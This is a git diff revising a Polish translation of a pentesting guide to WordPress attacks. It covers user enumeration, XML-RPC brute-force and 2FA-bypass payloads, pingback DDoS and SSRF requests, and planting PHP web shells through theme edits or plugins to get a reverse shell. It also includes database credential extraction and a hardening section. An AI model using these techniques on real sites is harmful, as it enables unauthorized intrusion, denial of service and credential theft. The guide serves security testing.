Translated ['network-services-pentesting/pentesting-web/wordpress.md'] t

This commit is contained in:
Translator 2024-04-27 13:40:17 +00:00
parent 640be12416
commit 92ba3ba541

View file

@ -7,7 +7,7 @@
Inne sposoby wsparcia HackTricks:
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Kup [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) na GitHubie.
@ -17,7 +17,7 @@ Inne sposoby wsparcia HackTricks:
<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
\
Użyj [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks), aby łatwo tworzyć i **automatyzować przepływy pracy** z wykorzystaniem najbardziej zaawansowanych narzędzi społeczności na świecie.\
Użyj [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks), aby łatwo tworzyć i **automatyzować przepływy pracy** z wykorzystaniem najbardziej zaawansowanych narzędzi społeczności.\
Otrzymaj dostęp już dziś:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
@ -25,7 +25,7 @@ Otrzymaj dostęp już dziś:
## Podstawowe informacje
**Przesłane** pliki trafiają pod: `http://10.10.10.10/wp-content/uploads/2018/08/a.txt`\
**Pliki motywów można znaleźć w /wp-content/themes/**, więc jeśli zmienisz pewne php motywu, aby uzyskać RCE, prawdopodobnie będziesz używać tej ścieżki. Na przykład: Korzystając z **motywu twentytwelve** możesz uzyskać dostęp do pliku **404.php** w: [**/wp-content/themes/twentytwelve/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)\
**Pliki motywów można znaleźć w /wp-content/themes/**, więc jeśli zmienisz pewne php motywu, aby uzyskać RCE, prawdopodobnie będziesz używać tej ścieżki. Na przykład: Korzystając z **motywu twentytwelve** możesz **uzyskać dostęp** do pliku **404.php** pod adresem: [**/wp-content/themes/twentytwelve/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)\
**Inny przydatny adres URL to:** [**/wp-content/themes/default/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
W pliku **wp-config.php** znajdziesz hasło główne bazy danych.
@ -35,8 +35,8 @@ Domyślne ścieżki logowania do sprawdzenia: _**/wp-login.php, /wp-login/, /wp-
### **Główne pliki WordPress**
* `index.php`
* `license.txt` zawiera przydatne informacje, takie jak zainstalowana wersja WordPress.
* `wp-activate.php` jest używany w procesie aktywacji e-mail podczas konfigurowania nowej witryny WordPress.
* `license.txt` zawiera przydatne informacje, takie jak zainstalowana wersja WordPressa.
* `wp-activate.php` jest używany do procesu aktywacji e-maili podczas konfigurowania nowej witryny WordPress.
* Foldery logowania (mogą być zmienione nazwy, aby je ukryć):
* `/wp-admin/login.php`
* `/wp-admin/wp-login.php`
@ -46,7 +46,7 @@ Domyślne ścieżki logowania do sprawdzenia: _**/wp-login.php, /wp-login/, /wp-
* Folder `wp-content` to główny katalog, w którym przechowywane są wtyczki i motywy.
* `wp-content/uploads/` to katalog, w którym przechowywane są wszystkie pliki przesłane na platformę.
* `wp-includes/` to katalog, w którym przechowywane są pliki rdzenia, takie jak certyfikaty, czcionki, pliki JavaScript i widżety.
* `wp-sitemap.xml` W wersjach WordPressa 5.5 i nowszych WordPress generuje plik sitemap XML z wszystkimi publicznymi wpisami i publicznie zapytywalnymi typami wpisów i taksonomiami.
* `wp-sitemap.xml` W wersjach WordPressa 5.5 i nowszych, WordPress generuje plik XML mapy witryny z wszystkimi publicznymi wpisami i publicznie zapytywalnymi typami wpisów i taksonomiami.
**Eksploatacja po zainfekowaniu**
@ -108,16 +108,16 @@ curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/supp
<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
\
Użyj [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks), aby łatwo budować i **automatyzować przepływy pracy** oparte na najbardziej zaawansowanych narzędziach społecznościowych na świecie.\
Użyj [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks), aby łatwo budować i **automatyzować przepływy pracy** z wykorzystaniem najbardziej zaawansowanych narzędzi społecznościowych na świecie.\
Otrzymaj dostęp już dziś:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
## Aktywna enumeracja
### Wtyczki i motywy
### Wtyczki i Motywy
Prawdopodobnie nie będziesz w stanie znaleźć wszystkich możliwych wtyczek i motywów. Aby odkryć je wszystkie, będziesz musiał **aktywnie przeprowadzić atak Brute Force na listę wtyczek i motywów** (na szczęście istnieją narzędzia automatyzujące zawierające te listy).
Prawdopodobnie nie będziesz w stanie znaleźć wszystkich możliwych Wtyczek i Motywów. Aby odkryć je wszystkie, będziesz musiał **aktywnie przeprowadzić atak Brute Force na listę Wtyczek i Motywów** (na szczęście istnieją narzędzia automatyzujące to zadanie).
### Użytkownicy
@ -139,17 +139,17 @@ Kolejny punkt końcowy `/wp-json/`, który może ujawnić pewne informacje o uż
```
curl http://blog.example.com/wp-json/oembed/1.0/embed?url=POST-URL
```
To zapytanie końcowe ujawnia tylko użytkowników, którzy opublikowali post. **Dane dotyczące użytkowników, którzy mają tę funkcję włączoną, zostaną udostępnione**.
Zauważ, że ten punkt końcowy ujawnia tylko użytkowników, którzy opublikowali post. **Dane będą udostępnione tylko dla użytkowników, którzy mają tę funkcję włączoną**.
Należy również zauważyć, że **/wp-json/wp/v2/pages** może ujawnić adresy IP.
Należy również zauważyć, że **/wp-json/wp/v2/pages** może ujawniać adresy IP.
#### Wyliczanie nazwy użytkownika podczas logowania
Podczas logowania do **`/wp-login.php`** **komunikat** jest **inny**, jeśli wskazana **nazwa użytkownika istnieje lub nie**.
Podczas logowania na **`/wp-login.php`** **komunikat** jest **inny**, w zależności od tego, czy podana **nazwa użytkownika istnieje, czy nie**.
### XML-RPC
Jeśli `xml-rpc.php` jest aktywny, można przeprowadzić atak siłowy na poświadczenia lub użyć go do uruchamiania ataków DoS na inne zasoby. (Można zautomatyzować ten proces [korzystając z tego](https://github.com/relarizky/wpxploit) na przykład).
Jeśli `xml-rpc.php` jest aktywny, można przeprowadzić atak siłowy na poświadczenia lub wykorzystać go do przeprowadzenia ataków DoS na inne zasoby. (Możesz zautomatyzować ten proces [korzystając z tego](https://github.com/relarizky/wpxploit) na przykład).
Aby sprawdzić, czy jest aktywny, spróbuj uzyskać dostęp do _**/xmlrpc.php**_ i wyślij to żądanie:
@ -176,11 +176,7 @@ Aby sprawdzić, czy jest aktywny, spróbuj uzyskać dostęp do _**/xmlrpc.php**_
```
Wiadomość _"Nieprawidłowa nazwa użytkownika lub hasło"_ w odpowiedzi kodu 200 powinna się pojawić, jeśli poświadczenia nie są poprawne.
![](<../../.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (4) (1).png>)
![](<../../.gitbook/assets/image (718).png>)
Korzystając z poprawnych poświadczeń, możesz przesłać plik. W odpowiedzi pojawi się ścieżka ([https://gist.github.com/georgestephanis/5681982](https://gist.github.com/georgestephanis/5681982))
![](<../../.gitbook/assets/image (107) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1
```markup
<?xml version='1.0' encoding='utf-8'?>
<methodCall>
@ -210,18 +206,18 @@ Korzystając z poprawnych poświadczeń, możesz przesłać plik. W odpowiedzi p
</params>
</methodCall>
```
**Sposób na szybsze** łamanie hasła to wykorzystanie **`system.multicall`**, dzięki czemu można wypróbować kilka poświadczeń w jednym żądaniu:
Również istnieje **szybszy sposób** łamania poświadczeń za pomocą **`system.multicall`**, ponieważ można wypróbować kilka poświadczeń w tej samej żądaniu:
<figure><img src="../../.gitbook/assets/image (625).png" alt=""><figcaption></figcaption></figure>
**Ominięcie 2FA**
Ta metoda jest przeznaczona dla programów, a nie dla ludzi, jest stara i dlatego nie obsługuje 2FA. Dlatego jeśli masz ważne dane logowania, ale główne wejście jest chronione przez 2FA, **możesz próbować wykorzystać xmlrpc.php do zalogowania się tymi danymi, omijając 2FA**. Należy zauważyć, że nie będziesz w stanie wykonać wszystkich działań, jakie można wykonać za pomocą konsoli, ale nadal możesz uzyskać RCE, jak to wyjaśnia Ippsec w [https://www.youtube.com/watch?v=p8mIdm93mfw\&t=1130s](https://www.youtube.com/watch?v=p8mIdm93mfw\&t=1130s)
Ta metoda jest przeznaczona dla programów, a nie dla ludzi, i jest przestarzała, dlatego nie obsługuje 2FA. Dlatego jeśli masz ważne poświadczenia, ale główne wejście jest chronione przez 2FA, **możesz próbować wykorzystać xmlrpc.php, aby zalogować się tymi poświadczeniami, omijając 2FA**. Należy zauważyć, że nie będziesz w stanie wykonać wszystkich działań, które można wykonać za pomocą konsoli, ale nadal możesz uzyskać dostęp do RCE, tak jak to wyjaśnia Ippsec w [https://www.youtube.com/watch?v=p8mIdm93mfw\&t=1130s](https://www.youtube.com/watch?v=p8mIdm93mfw\&t=1130s)
**DDoS lub skanowanie portów**
Jeśli znajdziesz metodę _**pingback.ping**_ na liście, możesz sprawić, że Wordpress wyśle dowolne żądanie do dowolnego hosta/portu.\
Można to wykorzystać do zmuszenia **tysięcy** stron **Wordpressa** do **dostępu** do jednej **lokalizacji** (co powoduje **DDoS** w tej lokalizacji) lub można użyć tego do zmuszenia **Wordpressa** do **skenowania** wewnętrznej **sieci** (można wskazać dowolny port).
Można to wykorzystać do zmuszenia **tysięcy** witryn **Wordpress** do **dostępu** do jednej **lokalizacji** (co powoduje **DDoS** w tej lokalizacji) lub można użyć tego do zeskanowania **Wordpressa** wewnętrznej **sieci** (możesz wskazać dowolny port).
```markup
<methodCall>
<methodName>pingback.ping</methodName>
@ -233,9 +229,7 @@ Można to wykorzystać do zmuszenia **tysięcy** stron **Wordpressa** do **dost
```
Jeśli otrzymasz **faultCode** z wartością **większą** niż **0** (17), oznacza to, że port jest otwarty.
Zajrzyj do użycia **`system.multicall`** w poprzedniej sekcji, aby dowiedzieć się, jak nadużyć tej metody w celu spowodowania ataku DDoS.
**DDoS**
Przejrzyj użycie **`system.multicall`** w poprzedniej sekcji, aby dowiedzieć się, jak nadużyć tej metody w celu spowodowania ataku DDoS.
```markup
<methodCall>
<methodName>pingback.ping</methodName>
@ -249,17 +243,17 @@ Zajrzyj do użycia **`system.multicall`** w poprzedniej sekcji, aby dowiedzieć
### wp-cron.php DoS
Ten plik zazwyczaj istnieje w głównym katalogu witryny Wordpress: **`/wp-cron.php`**\
Kiedy ten plik jest **odwoływany**, wykonywane jest "**ciężkie**" zapytanie MySQL, więc może być wykorzystany przez **atakujących** do **spowodowania** ataku typu **DoS**.\
Ten plik zazwyczaj istnieje pod głównym katalogiem witryny Wordpress: **`/wp-cron.php`**\
Kiedy ten plik jest **odwoływany**, wykonywane jest "**ciężkie**" zapytanie MySQL, dlatego może być wykorzystany przez **atakujących** do **spowodowania** ataku typu **DoS**.\
Ponadto, domyślnie `wp-cron.php` jest wywoływany przy każdym załadowaniu strony (za każdym razem, gdy klient żąda dowolnej strony Wordpress), co na witrynach o dużym ruchu może powodować problemy (DoS).
Zaleca się wyłączenie Wp-Cron i utworzenie prawdziwego zadania cron wewnątrz hosta, które będzie wykonywać wymagane czynności w regularnych odstępach czasu (bez powodowania problemów).
### /wp-json/oembed/1.0/proxy - SSRF
Spróbuj uzyskać dostęp do _https://worpress-site.com/wp-json/oembed/1.0/proxy?url=ybdk28vjsa9yirr7og2lukt10s6ju8.burpcollaborator.net_ i witryna Wordpress może wysłać do Ciebie żądanie.
Spróbuj uzyskać dostęp do _https://worpress-site.com/wp-json/oembed/1.0/proxy?url=ybdk28vjsa9yirr7og2lukt10s6ju8.burpcollaborator.net_ i witryna Worpress może wysłać do Ciebie żądanie.
Oto odpowiedź, gdy to nie działa:
To jest odpowiedź, gdy to nie działa:
![](<../../.gitbook/assets/image (362).png>)
@ -269,7 +263,7 @@ Oto odpowiedź, gdy to nie działa:
To narzędzie sprawdza, czy **methodName: pingback.ping** oraz ścieżka **/wp-json/oembed/1.0/proxy** istnieją, a jeśli tak, próbuje je wykorzystać.
### Automatyczne narzędzia
### Automatyczne Narzędzia
```bash
cmsmap -s http://www.domain.com -t 2 -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0"
wpscan --rua -e ap,at,tt,cb,dbe,u,m --url http://www.domain.com [--plugins-detection aggressive] --api-token <API_TOKEN> --passwords /usr/share/wordlists/external/SecLists/Passwords/probable-v2-top1575.txt #Brute force found users and search for vulnerabilities using a free API token (up 50 searchs)
@ -278,14 +272,14 @@ wpscan --rua -e ap,at,tt,cb,dbe,u,m --url http://www.domain.com [--plugins-detec
<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
\
Użyj [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks), aby łatwo budować i **automatyzować** przepływy pracy z wykorzystaniem najbardziej zaawansowanych narzędzi społecznościowych na świecie.\
Użyj [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) do łatwego budowania i **automatyzowania** workflowów z wykorzystaniem najbardziej zaawansowanych narzędzi społecznościowych na świecie.\
Otrzymaj dostęp już dziś:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
## Uzyskaj dostęp poprzez nadpisanie jednego bitu
To bardziej ciekawostka niż rzeczywisty atak. W CTF [https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man](https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man) można było zmienić 1 bit w dowolnym pliku WordPressa. Można było zmienić pozycję `5389` w pliku `/var/www/html/wp-includes/user.php`, aby zastąpić operację NOT (`!`) instrukcją NOP.
Więcej niż prawdziwy atak, to ciekawostka. W CTF [https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man](https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man) mogłeś zmienić 1 bit w dowolnym pliku wordpressa. Dlatego mogłeś zmienić pozycję `5389` w pliku `/var/www/html/wp-includes/user.php`, aby zastąpić operację NOT (`!`) operacją NOP.
```php
if ( ! wp_check_password( $password, $user->user_pass, $user->ID ) ) {
return new WP_Error(
@ -300,7 +294,7 @@ Zmień zawartość na php shell:
![](<../../.gitbook/assets/image (381).png>)
Znajdź w internecie, jak uzyskać dostęp do zaktualizowanej strony. W tym przypadku musisz uzyskać dostęp tutaj: [http://10.11.1.234/wp-content/themes/twentytwelve/404.php](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
Sprawdź w internecie, jak uzyskać dostęp do zaktualizowanej strony. W tym przypadku musisz uzyskać dostęp tutaj: [http://10.11.1.234/wp-content/themes/twentytwelve/404.php](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
### MSF
@ -313,7 +307,7 @@ use exploit/unix/webapp/wp_admin_shell_upload
### Wtyczka PHP
Możliwe jest przesłanie plików .php jako wtyczki.\
Utwórz swoje tylne drzwi php, używając na przykład:
Utwórz swoje tylne drzwi w PHP, używając na przykład:
![](<../../.gitbook/assets/image (180).png>)
@ -321,7 +315,7 @@ Następnie dodaj nową wtyczkę:
![](<../../.gitbook/assets/image (719).png>)
Prześlij wtyczkę i naciśnij Zainstaluj teraz:
Prześlij wtyczkę i kliknij Zainstaluj teraz:
![](<../../.gitbook/assets/image (246).png>)
@ -329,33 +323,33 @@ Kliknij na Przetwórz:
![](<../../.gitbook/assets/image (67).png>)
Prawdopodobnie na pierwszy rzut oka nic się nie stanie, ale jeśli przejdziesz do Mediów, zobaczysz przesłane tylne drzwi:
Prawdopodobnie na pierwszy rzut oka nic się nie stanie, ale jeśli przejdziesz do Mediów, zobaczysz przesłane przez siebie polecenie:
![](<../../.gitbook/assets/image (459).png>)
Otwórz je i zobaczysz adres URL do wykonania odwróconego powłoki:
Otwórz je i zobaczysz adres URL do wykonania odwróconego polecenia powłoki:
![](<../../.gitbook/assets/image (1003).png>)
### Przesyłanie i aktywowanie złośliwej wtyczki
Ta metoda polega na zainstalowaniu złośliwej wtyczki, która jest znana z podatności i może być wykorzystana do uzyskania powłoki sieciowej. Proces ten odbywa się za pośrednictwem pulpitu WordPress, zgodnie z poniższymi krokami:
Ta metoda polega na zainstalowaniu złośliwej wtyczki, która jest znana z podatności i może być wykorzystana do uzyskania powłoki sieciowej. Proces ten jest przeprowadzany za pośrednictwem pulpitu WordPress w następujący sposób:
1. **Pobranie wtyczki**: Wtyczka jest pobierana z takiego źródła jak Exploit DB, na przykład [**tutaj**](https://www.exploit-db.com/exploits/36374).
2. **Instalacja wtyczki**:
1. **Pobieranie Wtyczki**: Wtyczka jest pobierana z takiego źródła jak Exploit DB, na przykład [**tutaj**](https://www.exploit-db.com/exploits/36374).
2. **Instalacja Wtyczki**:
* Przejdź do pulpitu WordPress, następnie przejdź do `Pulpit > Wtyczki > Prześlij wtyczkę`.
* Prześlij plik zip pobranej wtyczki.
3. **Aktywacja wtyczki**: Po pomyślnej instalacji wtyczki, musi zostać aktywowana przez panel.
3. **Aktywacja Wtyczki**: Po pomyślnej instalacji wtyczki, musi zostać aktywowana za pośrednictwem pulpitu.
4. **Wykorzystanie**:
* Po zainstalowaniu i aktywowaniu wtyczki "reflex-gallery", można ją wykorzystać, ponieważ jest znana z podatności.
* Framework Metasploit udostępnia exploit dla tej podatności. Poprzez załadowanie odpowiedniego modułu i wykonanie określonych poleceń, można ustanowić sesję meterpreter, umożliwiając nieautoryzowany dostęp do witryny.
* Warto zauważyć, że jest to tylko jedna z wielu metod wykorzystania witryny WordPress.
Zawartość obejmuje pomoc wizualną przedstawiającą kroki w panelu WordPress dotyczące instalacji i aktywacji wtyczki. Jednak ważne jest zauważenie, że wykorzystywanie podatności w ten sposób jest nielegalne i niestosowne bez odpowiedniej autoryzacji. Te informacje powinny być używane odpowiedzialnie i tylko w kontekście legalnym, na przykład podczas testów penetracyjnych z wyraźną zgodą.
Zawartość obejmuje pomoc wizualną przedstawiającą kroki w pulpicie WordPress dotyczące instalacji i aktywacji wtyczki. Jednak ważne jest zauważenie, że wykorzystywanie podatności w ten sposób jest nielegalne i niestosowne bez odpowiedniej autoryzacji. Te informacje powinny być używane odpowiedzialnie i tylko w kontekście legalnym, na przykład podczas testów penetracyjnych z wyraźną zgodą.
**Aby uzyskać bardziej szczegółowe kroki, sprawdź:** [**https://www.hackingarticles.in/wordpress-reverse-shell/\*\***](https://www.hackingarticles.in/wordpress-reverse-shell/)
## Po Wykorzystaniu
## Post Eksploatacja
Wyodrębnij nazwy użytkowników i hasła:
```bash
@ -369,7 +363,7 @@ mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;UPDATE
### Regularne Aktualizacje
Upewnij się, że WordPress, wtyczki i motywy są aktualne. Potwierdź również, czy automatyczne aktualizacje są włączone w pliku wp-config.php:
Upewnij się, że WordPress, wtyczki i motywy są aktualne. Potwierdź również, że automatyczne aktualizacje są włączone w pliku wp-config.php:
```bash
define( 'WP_AUTO_UPDATE_CORE', true );
add_filter( 'auto_update_plugin', '__return_true' );
@ -386,20 +380,20 @@ add_filter( 'auto_update_theme', '__return_true' );
* Usuń domyślnego użytkownika **admin**
* Używaj **mocnych haseł** i **2FA**
* Okresowo **sprawdzaj** uprawnienia użytkowników
* **Ogranicz liczbę prób logowania** w celu zapobieżenia atakom Brute Force
* **Ogranicz liczbę prób logowania** w celu zapobieżenia atakom typu Brute Force
* Zmień nazwę pliku **`wp-admin.php`** i zezwalaj na dostęp tylko wewnętrznie lub z określonych adresów IP.
<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
\
Użyj [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) do łatwego tworzenia i **automatyzacji prac** przy użyciu najbardziej zaawansowanych narzędzi społecznościowych na świecie.\
Użyj [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks), aby łatwo budować i **automatyzować przepływy pracy** z wykorzystaniem najbardziej zaawansowanych narzędzi społecznościowych na świecie.\
Otrzymaj dostęp już dziś:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
<details>
<summary><strong>Dowiedz się, jak hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Zacznij od zera i zostań ekspertem AWS w dziedzinie hakingu z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Inne sposoby wsparcia HackTricks: